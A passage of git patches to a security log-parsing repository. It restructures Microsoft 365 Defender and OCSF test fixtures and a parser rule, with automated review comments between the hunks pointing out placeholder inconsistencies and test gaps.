b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index 0a0174b85..f1753e2d7 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, 
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json 
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", 
\"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": 
\"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 6077ecfdc..3e55ad2b0 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json 
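Review bot: The expected `OnPremSid` now matches the `S-1` placeholder in the input, which is the right fix, but the fixture still carries `GivenName`/`Surname` values that do not correspond to the `DOE John` placeholder display name, and a full `tenantId` GUID rather than the `xxxxxxxx-xxxx-…` form used in the DeviceProcessEvents fixture. If these are real values rather than constructed ones they should be replaced while this file is being touched, keeping a single placeholder identity consistent across `AccountDisplayName`, `GivenName`, `Surname` and `DistinguishedName`.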
@@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index f33a1eb87..55684497d 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 3cedbfdb3..5a6e54961 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, 
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 3a5d48cd4..9304ca1cb 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -22,10 +22,14 @@
 "@timestamp": "2024-09-24T14:18:11.864114Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
- "InitiatingProcessFileSize": 11864,
- "InitiatingProcessLogonId": "0",
- "LogonId": "0"
+ "LogonId": "0",
+ "process": {
+ "parent": {
+ "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "FileSize": 11864,
+ "LogonId": "0"
+ }
+ }
 },
 "type": "ProcessCreated"
 },
@@ -55,30 +59,36 @@ "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ From 99b7d065b680791ad270f5eb80aa0b40480c6650 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 14 Nov 2024 09:20:57 +0100 Subject: [PATCH 225/317] fix(OCSF): fix destination.ip --- OCSF/ocsf/ingest/parser.yml | 4 +- OCSF/ocsf/tests/test_network_activity_7.json | 42 ++++++++++++++++++++ 2 files changed, 45 insertions(+), 1 deletion(-) create mode 100644 OCSF/ocsf/tests/test_network_activity_7.json diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 765a6a76d..e43994811 100644 --- a/OCSF/ocsf/ingest/parser.yml 
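Review bot: On the new side `process.parent.pid` is `408996`, the same value as `process.pid`, whereas the old expectation gave the parent its own pid `408229`; a process and its parent sharing a pid is not a plausible ProcessCreated event. The fixture input is outside this hunk, so if `InitiatingProcessId` there really is `408996` the input should be corrected, and otherwise the parser stage that now fills `process.parent.pid` is reading `ProcessId` instead of `InitiatingProcessId`. Either way the expectation should not be committed with identical child and parent pids, because it would mask exactly the regression this restructuring can introduce.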
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -567,9 +567,11 @@ stages:
 destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}"
 filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}"
 - set:
- destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
 destination.mac: "{{ parse_event.message.dst_endpoint.mac }}"
 destination.port: "{{ parse_event.message.dst_endpoint.port }}"
+ - set:
+ destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
+ filter: "{{ parse_event.message.dst_endpoint.ip | is_ipaddress }}"
 - set:
 network.application: "{{ parse_event.message.dst_endpoint.svc_name }}"
 filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}"
diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json
new file mode 100644
index 000000000..271c6e7a2
--- /dev/null
+++ b/OCSF/ocsf/tests/test_network_activity_7.json
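Review bot: The new `destination.ip` stage is guarded with `is_ipaddress`, but `destination.mac` and `destination.port` in the stage above stay unconditional, and the added fixture's `src_endpoint.ip` carries the same `-` placeholder, so `source.ip` presumably needs the identical guard (that stage is outside the hunk). The filter also dereferences `dst_endpoint.ip` directly while the neighbouring filters use `.get('hostname')`/`.get('svc_name')`; for consistency and to be safe when the key is absent, `filter: "{{ parse_event.message.dst_endpoint.get('ip') | is_ipaddress }}"` is preferable. The added fixture's expected event shows no `destination` at all, which is consistent with the guard but does not demonstrate that a valid `dst_endpoint.ip` still maps; a positive case would make the regression test complete.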
@@ -0,0 +1,42 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "OCSF [BETA]", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + }, + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n" + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "event": { + "action": "unknown", + "category": [ + "network" + ], + "end": "2024-11-13T20:24:18Z", + "kind": "event", + "severity": 1, + "start": "2024-11-13T20:23:47Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-13T20:23:47Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "availability_zone": "euw3-az1", + "provider": "AWS", + "region": "eu-west-3" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Network Activity", + "class_uid": 4001 + } + } +} \ No 
newline at end of file From b2374d10776dfee644f3660f54064d4ce87002b8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 14 Nov 2024 09:23:57 +0100 Subject: [PATCH 226/317] fix(OCSF): apply linter --- OCSF/ocsf/tests/test_network_activity_7.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json index 271c6e7a2..c6192eda7 100644 --- a/OCSF/ocsf/tests/test_network_activity_7.json +++ b/OCSF/ocsf/tests/test_network_activity_7.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", "sekoiaio": { "intake": { "dialect": "OCSF [BETA]", "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" } - }, - "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n" + } }, "expected": { "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", From 943de11e6ab15711fa104a51ee2e5a41b90a3ab5 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Thu, 14 Nov 2024 11:41:51 +0100 Subject: [PATCH 227/317] Enhancement/Winlogbeat: Addition of new events --- .../winlogbeat/tests/security_event_4624.json | 145 +++++++++++++ .../winlogbeat/tests/security_event_4625.json | 193 ++++++++++++++++++ .../winlogbeat/tests/security_event_4634.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4662.json | 105 ++++++++++ .../winlogbeat/tests/security_event_4672.json | 82 ++++++++ .../winlogbeat/tests/security_event_4689.json | 88 ++++++++ .../winlogbeat/tests/security_event_4720.json | 127 ++++++++++++ .../winlogbeat/tests/security_event_4722.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4723.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4725.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4726.json | 84 ++++++++ .../winlogbeat/tests/security_event_4768.json | 102 +++++++++ .../winlogbeat/tests/security_event_4769.json | 101 +++++++++ .../winlogbeat/tests/security_event_4798.json | 114 +++++++++++ .../winlogbeat/tests/security_event_5140.json | 5 - .../winlogbeat/tests/security_event_5145.json | 7 - 16 files changed, 